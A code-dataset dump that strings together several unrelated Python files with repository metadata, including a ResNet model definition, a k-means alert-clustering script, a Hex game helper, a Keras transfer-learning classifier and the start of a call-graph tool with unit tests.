self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
spm_on = False
if planes == 512:
spm_on = self.spm_on
layers = []
layers.append(block(self.inplanes, planes, stride, downsample,spm_on=spm_on))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
if i >= blocks - 1 or planes == 512:
spm_on = self.spm_on
layers.append(block(self.inplanes, planes,spm_on=spm_on))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
return model
def resnet34(pretrained=False, **kwargs):
"""Constructs a ResNet-34 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))
return model
def resnet50(pretrained=False, **kwargs):
"""Constructs a ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet50']))
return model
def resnet101(pretrained=False, **kwargs):
"""Constructs a ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet101']))
return model
def resnet152(pretrained=False, **kwargs):
"""Constructs a ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))
return model
|
[
"734504548@qq.com"
] |
734504548@qq.com
|
87d4b4ebc24eaadfa59d9ccf86df148e535339ef
|
b7fa0b3198ced1e775cacff7c091dd13024f4b33
|
/kmeans_bluewarning_analysis.py
|
24458c222996fc4e3b511a6ec89b27f9cc14df0d
|
[] |
no_license
|
Dechuan/BlueWarning_clusters
|
9052b23f56fd72fab414a86d3d057efd382833a9
|
2c5b2c4f7c7cb3b7ee5dde9cf99540e1c73859f2
|
refs/heads/master
| 2020-07-12T12:27:29.346655
| 2019-08-28T01:23:26
| 2019-08-28T01:23:26
| 204,819,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,370
|
py
|
from sklearn.feature_extraction.text import CountVectorizer,TfidfTransformer
from sklearn.cluster import KMeans
import jieba
from sklearn import metrics
import pandas as pd
#import os
def kmeans_blue_warning(in_df):
n_clusters=10
abs_score_list = []
ScoreList = []
CountDict = dict()
TrainData = in_df['summary'].tolist()
TrainIndex= in_df['id'].tolist()
TrainTime=in_df['timestamp'].tolist()
TrainKey=in_df['key'].tolist()
vectorizer = CountVectorizer()
X = vectorizer.fit_transform([" ".join([b for b in jieba.lcut(a,cut_all=True)]) for a in TrainData])
word = vectorizer.get_feature_names()
print('word:',word)
transformer = TfidfTransformer()
tfidf = transformer.fit_transform(X.toarray())
km=KMeans(10)
km.fit(tfidf.toarray())
for i in tfidf.toarray():
score = km.score(i.reshape(1, -1))
ScoreList.append(score)
abs_score_list.append(abs(score))
sort_score_list = sorted(abs_score_list)
scorelen = len(sort_score_list)
for i in sort_score_list:
count = 0
for j in sort_score_list:
if j <= i:
count = count + 1
CountDict[i] = count / scorelen
bin_start=0
ModelDict = {}
Risk = []
Summary = []
Category = []
Variance = []
i=0
while bin_start < len(km.labels_):
scores = ScoreList[bin_start]
cdfscore = CountDict[abs(scores)]
Risk.append(round(1 / (1.0001 - cdfscore), 0))
#Summary.append(TrainData[bin_start])
Category.append(km.labels_[bin_start])
#Variance.append(scores)
bin_start = bin_start+ 1
while i<len(Risk):
if Risk[i]>=1000:
Risk[i]='1000+'
elif (Risk[i]<1000)&(Risk[i]>=100):
Risk[i]='100+'
elif (Risk[i]<100)&(Risk[i]>=10):
Risk[i]='10+'
elif Risk[i]<10:
Risk[i]='1+'
i=i+1
ModelDict = {'id': TrainIndex,'risk': Risk,'category':Category,'summary':TrainData,'timestamp':TrainTime,'key':TrainKey}
out_df= pd.DataFrame(ModelDict, columns=['id', 'risk','category','summary','timestamp','key'])
return out_df
#dataFile = 'data/OUTPUT.csv'
dataFile='data/alert2.csv'
data = pd.read_csv(dataFile,encoding="gb2312")
print(data)
result = kmeans_blue_warning(data)
result.to_csv("result/keys_TFIDF.csv",index=False)
|
[
"songciting@163.com"
] |
songciting@163.com
|
bfaeee67905c14d2f409f6f49ffa39866004282a
|
69974e2912b95495b23b9912001ddf3a1f71cbe9
|
/Learn_Args&Kwargs.py
|
66cf3cbb717d12770636a9b4ad0863e70fd31691
|
[] |
no_license
|
AbhinavNmdo/Python
|
84fe7b7512defa210742f2384925d4e16cb79579
|
8a66592478111487df9af7f16ca0b127935dad22
|
refs/heads/master
| 2023-07-16T15:17:24.122926
| 2021-08-31T05:59:25
| 2021-08-31T05:59:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
def name(*args, **kwargs): # Always follow this ==> (normal statement, args statement, kwargs statement)
print("This is args statement")
for item in args:
print(item)
print("This is kwargs statement")
for i, j in kwargs.items():
print(f"{i} is a {j}")
names = ["Abhay", "Ashu", "PapaJi", "MummyJi"] # Add krte jao isme koi error nhi aaiega
print(name(*names))
names2 = {"Abhay": "Programmer", "Ashu": "CA", "PapaJi": "WebDeveloper", "MummyJi": "HouseWife"}
print(name(**names2))
|
[
"abhaynam22@gmail.com"
] |
abhaynam22@gmail.com
|
7e3e293ac3834b01926d52d452d737a1aaa352ae
|
c836d305745c0d024c75f053f619f4e3193ce978
|
/gelin_group.py
|
a071017c051f2bfaf844c2b8bfb4f873cd949500
|
[] |
no_license
|
eguinosa/minimax-hex
|
5fc87421528eb5929994f329629edfa58b80d3a7
|
9adaed2afe857deb517dbeeb5ffd97da5ca83bb6
|
refs/heads/master
| 2023-06-04T15:59:51.065212
| 2021-05-21T02:10:56
| 2021-05-21T02:10:56
| 379,028,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,776
|
py
|
# Gelin Eguinosa Rosique
# C-511
class Group:
"""Class to represent a group of stone with the same color"""
def __init__(self, game, player, positions):
"""
Save the location of the stones of the group, the board and the player.
Look how many rows or columns covers, to see how close to winning is the
player.
"""
self.positions = positions
self.game = game
self.player = player
# Checking the length of the group
min_pos, max_pos, group_length = self.__length()
self.min_pos = min_pos
self.max_pos = max_pos
self.length = group_length
def empty_neighbours(self):
"""Look for all the empty cells that are next to the stones of the group"""
result_neighbours = []
search_map = [[False] * self.game.size for _ in range(self.game.size)]
for position in self.positions:
x = position[0]
y = position[1]
search_map[x][y] = True
for nx, ny in self.game.neighbour(x, y):
if search_map[nx][ny]:
continue
search_map[nx][ny] = True
if self.game[nx, ny] == '.':
result_neighbours.append((nx, ny))
# Sort the neighbours depending on how much they get closer the player to the edges
result_neighbours.sort(key=lambda pos: self.__pos_advantage(pos))
return result_neighbours
def __pos_advantage(self, pos):
"""
Gives a value determining how good would it be to play in this position of the board
for the player.
-1: if it expands the group one step
0: if it is in the edge of the group
positive number: if it is inside the edges of the group
"""
if self.player == 'W':
y = pos[1]
min_y = self.min_pos[1]
max_y = self.max_pos[1]
if y < min_y or y > max_y:
return -1
if y == min_y or y == max_y:
return 0
distance_to_edge = max(y-min_y, max_y - y)
return distance_to_edge
# self.player == 'B'
x = pos[0]
min_x = self.min_pos[0]
max_x = self.max_pos[0]
if x < min_x or x > max_x:
return -1
if x == min_x or x == max_x:
return 0
distance_to_edge = max(x - min_x, max_x - x)
return distance_to_edge
def __length(self):
"""
Look for how many of the rows ('B' player) or columns ('A' player) does this group
covers, so to know how close is the player to win the game. If the player has
covered all the rows or columns in a connected group, the player wins the game.
:return: the number of columns or rows the group covers.
"""
if self.player == 'W':
y_min = min(self.positions, key=lambda pos: pos[1])
y_max = max(self.positions, key=lambda pos: pos[1])
y_length = y_max[1] - y_min[1] + 1
return y_min, y_max, y_length
# self.player == 'B'
x_min = min(self.positions, key=lambda pos: pos[0])
x_max = max(self.positions, key=lambda pos: pos[0])
x_length = x_max[0] - x_min[0] + 1
return x_min, x_max, x_length
def connected_group(game, player, visited_area):
"""Search for all the connected stones of the same player"""
positions = []
neighbours = []
# Flag to stop the double for
stop = False
for x in range(game.size):
for y in range(game.size):
if visited_area[x][y]:
continue
elif game[x, y] != player:
visited_area[x][y] = True
continue
else:
# game[x, y] == player and not visited_area[x][y]:
visited_area[x][y] = True
positions.append((x, y))
neighbours += list(game.neighbour(x, y))
stop = True
if stop:
break
if stop:
break
# No player found on the board
if not positions:
found_group = False
return found_group, None
# Search for all the positions of the player connected to the one in group
while neighbours:
x, y = neighbours.pop(0)
if visited_area[x][y]:
continue
elif game[x, y] != player:
visited_area[x][y] = True
continue
# game[x, y] == player and not visited_area[x][y]:
visited_area[x][y] = True
positions.append((x, y))
neighbours += list(game.neighbour(x, y))
found_group = True
result_group = Group(game, player, positions)
return found_group, result_group
|
[
"eguinosa@gmail.com"
] |
eguinosa@gmail.com
|
405ac1f07f1a750299e9f7a772a78a0b4ac771b0
|
3c64db21529ebcd9d5612c49d71852df5f794043
|
/classifier.py
|
9bcc9db015e4ba09bf4456db797884b22c059073
|
[] |
no_license
|
theerawatramchuen/AutoX_Kaggle_Rasnet50
|
265fdc17950e8304ac62554aaf7f49802401489b
|
b9dd0e891bfe15a9b0f79ea82a98bc630230d9e3
|
refs/heads/master
| 2020-06-11T05:58:28.369710
| 2019-07-07T23:06:10
| 2019-07-07T23:06:10
| 193,869,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,338
|
py
|
# coding: utf-8
# ### Global Constants
# Fixed for our Cats & Dogs classes
NUM_CLASSES = 2
# Fixed for Cats & Dogs color images
CHANNELS = 3
IMAGE_RESIZE = 224
RESNET50_POOLING_AVERAGE = 'avg'
DENSE_LAYER_ACTIVATION = 'softmax'
OBJECTIVE_FUNCTION = 'categorical_crossentropy'
## Common accuracy metric for all outputs, but can use different metrics for different output
LOSS_METRICS = ['accuracy']
# Using 1 to easily manage mapping between test_generator & prediction for submission preparation
BATCH_SIZE_TESTING = 1
import numpy as np
import pandas as pd
from tensorflow.python.keras.applications import ResNet50
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense
# ### ResNet50
resnet_weights_path = 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
# ### Define Our Transfer Learning Network Model Consisting of 2 Layers
model = Sequential()
# 1st layer as the lumpsum weights from resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5
# NOTE that this layer will be set below as NOT TRAINABLE, i.e., use it as is
model.add(ResNet50(include_top = False, pooling = RESNET50_POOLING_AVERAGE, weights = resnet_weights_path))
# 2nd layer as Dense for 2-class classification, i.e., dog or cat using SoftMax activation
model.add(Dense(NUM_CLASSES, activation = DENSE_LAYER_ACTIVATION))
# Say not to train first layer (ResNet) model as it is already trained
model.layers[0].trainable = False
model.summary()
# ### Compile Our Transfer Learning Model
from tensorflow.python.keras import optimizers
sgd = optimizers.SGD(lr = 0.01, decay = 1e-6, momentum = 0.9, nesterov = True)
model.compile(optimizer = 'sgd', loss = OBJECTIVE_FUNCTION, metrics = LOSS_METRICS)
# Load saved weight file
model.load_weights("working/best.hdf5")
# ### Prepare Keras Data Generators
from keras.applications.resnet50 import preprocess_input
from keras.preprocessing.image import ImageDataGenerator
image_size = IMAGE_RESIZE
# preprocessing_function is applied on each image but only after re-sizing & augmentation (resize => augment => pre-process)
# Each of the keras.application.resnet* preprocess_input MOSTLY mean BATCH NORMALIZATION (applied on each batch) stabilize the inputs to nonlinear activation functions
# Batch Normalization helps in faster convergence
data_generator = ImageDataGenerator(preprocessing_function=preprocess_input)
test_generator = data_generator.flow_from_directory(
directory = 'blind/',
target_size = (image_size, image_size),
batch_size = BATCH_SIZE_TESTING,
class_mode = None,
shuffle = False,
seed = 123
)
## Reset before each call to predict
test_generator.reset()
pred = model.predict_generator(test_generator, steps = len(test_generator), verbose = 1)
predicted_class_indices = np.argmax(pred, axis = 1)
results_df = pd.DataFrame(
{
'id': pd.Series(test_generator.filenames),
'label': pd.Series(predicted_class_indices)
})
#results_df['id'] = results_df.id.str.extract('(\d+)')
#results_df['id'] = pd.to_numeric(results_df['id'], errors = 'coerce')
results_df.sort_values(by='id', inplace = True)
## Save Result to csv file
results_df.to_csv('submission.csv', index=False)
results_df.head()
# ### References
#
# 1. [Transfer Learning by Dan B](https://www.kaggle.com/dansbecker/transfer-learning)
|
[
"noreply@github.com"
] |
noreply@github.com
|
23e1c139d1f5d6d1538a825da39ce84355784a5c
|
eaf993358c740e2e86df4a0cd06beed51786c045
|
/credictcard/model.py
|
8ba3b4dfe8ab95e8cc3914d77a335152733a44e1
|
[] |
no_license
|
mzjdy/credict
|
de6bc7c7ae72e7e1a49fc3407a124bdb34b2fd77
|
901dced9d6455c314839bcfb5334c1d8702a5f99
|
refs/heads/master
| 2020-04-18T00:56:41.462673
| 2018-05-01T09:10:38
| 2018-05-01T09:10:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
from sklearn.cross_validation import train_test_split
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
#%matplotlib inline
import seaborn as sns
from numpy import log
from sklearn.linear_model import LogisticRegression
import math
data = pd.read_csv('cs_training.csv')
data.columns = ['Unnamed: 0', 'Y','x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
data = data[data.x2>20]
data = data[data.x2<91]
data = data[data.x3<50]
data = data[data.x7<50]
index1 = data[data['x5'].isnull()].index
ageList = data['x2'].unique()
fillDict = {}
for age in ageList:
fillDict[age] = data[data.x2==age]['x5'].median()
def fill_monthIncome(data,index1):
for i in index1:
age = data.loc[i,'x2']
fill_value = fillDict[age]
data.loc[i,'x5'] = fill_value
fill_monthIncome(data.index1)
data.to_csv('clean_data.csv')
data = pd.read_csv('clean_data.csv')
names = ['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
X = data.loc[:,['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']]
Y = data['Y']
list1 = list(data.x2.unique())
list1 = sorted(list1)
IncomeMedian = []
for i in list1:
result = data[data.x2==i]['x5'].median()
IncomeMedian.append(result)
def get_value(data,feature):
test1 = list(data[feature].unique())
test1 = sorted(test1)
return test1
total_good = len(data)-data['Y'].sum()
total_bad = data['Y'].sum()
total_ratio = data['Y'].sum()/(len(data)-data['Y'].sum())
def compute_woe1(data,feature,n):
woe_dict ={}
iv = 0
total_list = data[feature].value_counts()
index1 = get_value(data,feature)
for i in index1:
if i <= n:
bad = data[data[feature]==i]['Y'].sum()
good = total_list[i] - bad
result = bad/good
woe = log(result/total_ratio)
woe_dict[i] = woe
iv_test = (bad/total_bad - good/total_good)*woe
iv = iv+iv_test
else:
bad = data[data[feature]>=i]['Y'].sum()
good = len(data[data[feature]>=i]['Y']) - bad
result = bad/good
woe = log(result/total_ratio)
woe_dict[i] = woe
iv_test = (bad/total_bad - good/total_good)*woe
iv = iv+iv_test
break
return woe_dict,iv
data.x1 = pd.qcut(data.x1,10,labels=[0,1,2,3,4,5,6,7,8,9])
data.x2 = pd.cut(data.x2,bins=[20,25,30,35,40,50,60,70,90],labels=[0,1,2,3,4,5,6,7])
data.x4 = pd.qcut(data.x4,20,labels=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19])
data.x5 = pd.qcut(data.x5,20,labels=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19])
woe_x1,IV1 = compute_woe1(data,'x1',100)
woe_x2,IV2 = compute_woe1(data,'x2',100)
woe_x3,IV3 = compute_woe1(data,'x3',6)
woe_x4,IV4 = compute_woe1(data,'x4',100)
woe_x5,IV5 = compute_woe1(data,'x5',100)
woe_x6,IV6 = compute_woe1(data,'x6',20)
woe_x7,IV7 = compute_woe1(data,'x7',5)
woe_x8,IV8 = compute_woe1(data,'x8',7)
woe_x9,IV9 = compute_woe1(data,'x9',4)
woe_x10,IV10 = compute_woe1(data,'x10',5)
index1 = data[data.x3>=4].index
data.loc[index1,'x3'] = 4
index2 = data[data.x7>=4].index
data.loc[index2,'x7'] = 4
index3 = data[data.x9>=4].index
data.loc[index3,'x9'] = 4
IVList = [IV1, IV2, IV3, IV4, IV5, IV6, IV7, IV8, IV9, IV10]
index=['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
fig1 = plt.figure(1)
ax1 = fig1.add_subplot(1, 1, 1)
x = np.arange(len(index))+1
ax1.bar(x, IVList, width=0.4)
ax1.set_xticks(x)
ax1.set_xticklabels(index, rotation=0, fontsize=12)
ax1.set_ylabel('IV(Information Value)', fontsize=14)
for a, b in zip(x, IVList):
plt.text(a, b + 0.01, '%.4f' % b, ha='center', va='bottom', fontsize=10)
plt.show()
def convert_woe(feature,woe):
list1 = []
for i in data[feature]:
if i in woe.keys():
list1.append(woe[i])
else:
list1.append(woe[(len(woe)-1)])
return list1
data.x1 = convert_woe('x1',woe_x1)
data.x2 = convert_woe('x2', woe_x2)
data.x3 = convert_woe('x3', woe_x3)
data.x7 = convert_woe('x7', woe_x7)
data.x9 = convert_woe('x9', woe_x9)
data = data.drop(['x4','x5','x6','x8','x10'],axis=1)
data = data.loc[:,['Y','x1','x2','x3','x7','x9']]
Y = data.Y
X = data.loc[:,['x1','x2','x3','x7','x9']]
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
lr = LogisticRegression(C=0.1)
lr.fit(X_train,Y_train)
#lr.coef_
y_pred = lr.predict(X_test)
fpr, tpr, thresholds = roc_curve(Y_test,y_pred)
roc_auc = auc(fpr,tpr)
# Plot ROC
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b',label='AUC = %0.2f'% roc_auc)
plt.legend(loc='lower right')
plt.plot([0,1],[0,1],'r--')
plt.xlim([-0.1,1.0])
plt.ylim([-0.1,1.01])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
coe=[9.738849,0.638002,0.505995,1.032246,1.790041,1.131956]
p = 20 / math.log(2)
q = 600 - 20 * math.log(20) / math.log(2)
baseScore = round(q + p * coe[0], 0)
data.x1 = convert_woe('x1',woe_x1)
data.x2 = convert_woe('x2', woe_x2)
data.x3 = convert_woe('x3', woe_x3)
data.x7 = convert_woe('x7', woe_x7)
data.x9 = convert_woe('x9', woe_x9)
data.x1 = round(data.x1*p*coe[1])
data.x2 = round(data.x2*p*coe[2])
data.x3 = round(data.x3*p*coe[3])
data.x7 = round(data.x7*p*coe[7])
|
[
"noreply@github.com"
] |
noreply@github.com
|
e63e563efcb703fca24d599bdd39bad1a435a2e9
|
261830843d9474eff5ad951eb75e273e2ecfd2b1
|
/ginger/app/api/v1/gift.py
|
b05b7333fd567547817376a010ad138a10d54962
|
[] |
no_license
|
shuaibikong/RESTful
|
1d1c21ac77ccd0d6928a5a9170b4b3f931f13d7e
|
e0dfd73b79537b1cfc232f7cb3b724c935225a4b
|
refs/heads/master
| 2022-12-13T02:16:00.567817
| 2018-11-08T10:25:41
| 2018-11-08T10:25:41
| 147,464,952
| 0
| 0
| null | 2021-05-06T19:24:45
| 2018-09-05T05:34:19
|
Python
|
UTF-8
|
Python
| false
| false
| 675
|
py
|
from flask import g
from app.libs.error_code import Success
from app.libs.redprint import Redprint
from app.libs.token_auth import auth
from app.models.base import db
from app.models.book import Book
from app.models.gift import Gift
api = Redprint('gift')
@api.route('/<isbn>', methods=['POST'])
@auth.login_required
def create(isbn):
uid = g.user.uid
with db.auto_commit():
Book.query.filter_by(isbn=isbn).first_or_404()
gift = Gift.query.filter_by(isbn=isbn, uid=uid).first()
if gift:
raise DuplicateGift()
gift = Gift()
gift.isbn = isbn
gift.uid = uid
db.session.add(gift)
return Success()
|
[
"40583736+shuaibikong@users.noreply.github.com"
] |
40583736+shuaibikong@users.noreply.github.com
|
fd11361d5c3dec153900e545c8908017550eba3e
|
eaf921d22d1d42d70b5f49d8f97f42e27ad5c16f
|
/Chap03/use_regex.py
|
31c3dfff2b10eb17e284911ebc69fc852daa7927
|
[] |
no_license
|
atastet/Python_openclassroom
|
0f3ff87c44527edde4722a311bf3bbece123edfd
|
37992f3eb8937b7480aedbbd83152451eaa8c6b8
|
refs/heads/master
| 2020-03-19T13:48:26.439159
| 2019-01-30T20:25:30
| 2019-01-30T20:25:30
| 136,595,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
# -*-coding:Utf-8 -*
import re
chaine = ""
exp = r"^0[0-9]([ .-]?[0-9]{2}){4}$"
while re.search(exp, chaine) is None:
raw_input("Numero")
|
[
"Anthony@macbook-pro-de-anthony.home"
] |
Anthony@macbook-pro-de-anthony.home
|
58ea7cf638432fef55e251a1f9aa71b69ef8417b
|
590aab339221662f547f8dbd45dfed336821a8cb
|
/cally.py
|
18097070d37bf5cfbb7d8c5ce7a092071a23a84d
|
[
"Apache-2.0"
] |
permissive
|
krish2487/cally
|
d4fdea1d80903d697af292acabd5e994567b3346
|
f043437f122b5b71179fc178f24180b8ee679270
|
refs/heads/master
| 2022-01-14T14:03:41.090612
| 2018-04-06T09:31:01
| 2018-04-06T09:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,708
|
py
|
#!/usr/bin/python
#
# Copyright 2018, Eelco Chaudron
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Files name:
# mkcg.py
#
# Description:
# Make callgraph .dot file from GCC's rtl data
#
# Author:
# Eelco Chaudron
#
# Initial Created:
# 29 March 2018
#
# Notes:
#
#
# Imports
#
import argparse
import fileinput
import os
import re
import sys
import time
#
# Unit tests for the dump_path() function.
# Invoke as: cally.py --unit-test dummy
#
# - Add --unit-test option
#
#
# Main -> A --> B --> C --> D
# A |_ [E]
# |_ F
# |_ G --> B
# \_ H --> I --> J --> D
#
#
#
#
unit_test_full_dump_output = [
'strict digraph callgraph {',
'"A" -> "A";', '"A" -> "B";',
'"B" -> "C";', '"B" -> "E";',
'"E" [style=dashed]', '"B" -> "F";',
'"B" -> "G";', '"B" -> "H";',
'"C" -> "D";', '"D"', '"F"',
'"G" -> "B";', '"H" -> "I";',
'"I" -> "J";', '"J" -> "D";',
'"main" -> "A";',
'}'
]
unit_test_full_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B" -> "C" -> "D";',
'"A" -> "B" -> "E";\n"E" [style=dashed];',
'"A" -> "B" -> "G" -> "B";',
'"A" -> "B" -> "F";'
]
unit_test_noexterns_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B" -> "C" -> "D";',
'"B" [color=red];',
'"A" -> "B" -> "G" -> "B";',
'"A" -> "B" -> "F";'
]
unit_test_maxdepth2_caller_output = [
'"A" -> "A";',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B";\n"B" [color=red];'
]
unit_test_maxdepth3_caller_output = [
'"A" -> "A";',
'"A" -> "B" -> "H";\n"H" [color=red];',
'"A" -> "B" -> "C";\n"C" [color=red];',
'"A" -> "B" -> "E";\n"E" [style=dashed];',
'"A" -> "B" -> "G";\n"G" [color=red];',
'"A" -> "B" -> "F";'
]
unit_test_regex_caller_output = [
'"A" -> "A";', '"A" -> "B" -> "H" -> "I" -> "J" -> "D";',
'"A" -> "B";\n"B" [color=red];',
'"B" [color=red];',
'"A" -> "B";\n"B" [color=red];',
'"A" -> "B" -> "F";']
unit_test_full_callee_output = [
'"A" -> "A" -> "B";', '"main" -> "A" -> "B";', '"B" -> "G" -> "B";'
]
unit_test_maxdepth4_callee_output = [
'"A" -> "A" -> "B" -> "C" -> "D";',
'"A" -> "B" -> "C" -> "D";\n"A" [color=red];',
'"G" -> "B" -> "C" -> "D";\n"G" [color=red];',
'"H" -> "I" -> "J" -> "D";\n"H" [color=red];'
]
unit_test_maxdepth5_callee_output = [
'"A" -> "A" -> "B" -> "C" -> "D";', '"main" -> "A" -> "B" -> "C" -> "D";',
'"B" -> "G" -> "B" -> "C" -> "D";', '"B" -> "H" -> "I" -> "J" -> "D";'
]
#
# Actual unit test
#
def unit_test():
#
# Built test functions dictionary
#
functions = dict()
unit_test_add_call(functions, "main", ["A"])
unit_test_add_call(functions, "A", ["A", "B"])
unit_test_add_call(functions, "B", ["C", "E", "F", "G", "H"])
unit_test_add_call(functions, "C", ["D"])
unit_test_add_call(functions, "D", [])
# "E" does not exists, it's an external function
unit_test_add_call(functions, "F", [])
unit_test_add_call(functions, "G", ["B"])
unit_test_add_call(functions, "H", ["I"])
unit_test_add_call(functions, "I", ["J"])
unit_test_add_call(functions, "J", ["D"])
build_callee_info(functions)
#
# Execute unit tests
#
print_dbg("UNIT TEST START")
print_dbg("---------------")
total = 0
failures = 0
#
# Full graph dump
#
print_dbg("")
print_dbg("FULL GRAPH")
print_dbg("============")
total += 1
buffer = list()
full_call_graph(functions, stdio_buffer=buffer)
failures += unit_test_check_error("FULL GRAPH",
unit_test_full_dump_output, buffer)
#
# Full caller dump
#
print_dbg("")
print_dbg("FULL CALLER")
print_dbg("===========")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("FULL CALLER",
unit_test_full_caller_output, buffer)
#
# Full caller dump with no exters
#
print_dbg("")
print_dbg("CALLER NO EXTERNS")
print_dbg("=================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude=None,
no_externs=True,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, NO_EXTERNS",
unit_test_noexterns_caller_output,
buffer)
#
# Caller with limit depth
#
print_dbg("")
print_dbg("CALLER LIMITED DEPTH (2)")
print_dbg("========================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=2,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, MAX DEPTH 2",
unit_test_maxdepth2_caller_output,
buffer)
print_dbg("")
print_dbg("CALLER LIMITED DEPTH (3)")
print_dbg("========================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=3,
exclude=None,
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, MAX DEPTH 3",
unit_test_maxdepth3_caller_output,
buffer)
#
# Caller with limited by regex
#
print_dbg("")
print_dbg("CALLER REGEX MATCH")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "A",
max_depth=0,
exclude="C|E|G",
no_externs=False,
stdio_buffer=buffer)
failures += unit_test_check_error("CALLER, REGEX",
unit_test_regex_caller_output,
buffer)
#
# Full callee
#
print_dbg("")
print_dbg("CALLEE FULL")
print_dbg("===========")
total += 1
buffer = list()
dump_path([], functions, "B",
max_depth=0,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, FULL",
unit_test_full_callee_output,
buffer)
#
# Max depth callee
#
print_dbg("")
print_dbg("CALLEE MAX DEPTH 4")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "D",
max_depth=4,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, MAX DEPTH 4",
unit_test_maxdepth4_callee_output,
buffer)
print_dbg("")
print_dbg("CALLEE MAX DEPTH 5")
print_dbg("==================")
total += 1
buffer = list()
dump_path([], functions, "D",
max_depth=5,
reverse_path=True,
exclude=None,
call_index="callee_calls",
stdio_buffer=buffer)
failures += unit_test_check_error("CALLEE, MAX DEPTH 5",
unit_test_maxdepth5_callee_output,
buffer)
#
# Show results
#
print_dbg("")
print_dbg("UNIT TEST END, RESULTS")
print_dbg("----------------------")
print_dbg("Total tests run: {}".format(total))
print_dbg("Total errors : {}".format(failures))
if failures > 0:
print_err("!!! ERRORS WHERE FOUND !!!")
return 0
#
# unit_test_check_error()
#
